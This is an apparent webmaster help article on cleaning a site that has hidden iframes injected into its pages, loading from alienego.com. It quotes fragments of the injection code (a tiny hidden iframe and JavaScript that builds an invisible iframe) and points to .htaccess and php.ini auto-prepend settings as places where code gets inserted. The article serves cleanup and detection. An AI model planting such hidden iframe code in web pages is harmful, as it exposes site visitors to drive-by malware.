Malicious software is hosted on 1 domain(s), including alienego.com/.
Here are a couple of things to look for.
2: e(s); < / sc ript > < !-- /ad -- >
<iframe src='http://alienego.com/adv/ego/fmcuewen9.php' width='10' height='10' style='visi
var f = document.createElement('iframe');
f.style.visibility = 'hidden';
f.style.position = 'absolute';
f.style.left = '0';
f.style.top = '0';
In this site the code had been inserted in most of the site's static html pages before the Doctype declaration. There are some variations to the code, on some sites you will see this line
instead of this one
Start by checking your site's web pages. If Google has flagged your site they will sometimes provide the URLs of some of the pages that contain the code so check your Webmaster Tools account for any information. To check the pages I suggest you use an online tool like Redleg's File Viewer. Using an online tool provides a somewhat safer way to check the files and offers the advantage of displaying the content that is being sent to a user's browser. This is particularly useful with dynamic pages such as php pages.
There are a couple of common techniques hackers use to insert code into a file at run-time. For sites running on Apache a hack of the .htaccess is often used. There are some tips on checking the .htaccess file here.
With php sites it is common to hack the php configuration file php.ini. Open the php.ini file an look for these configuration lines
; Automatically add files before PHP document.
; Automatically add files after PHP document.
; http:// php . net /auto-append-file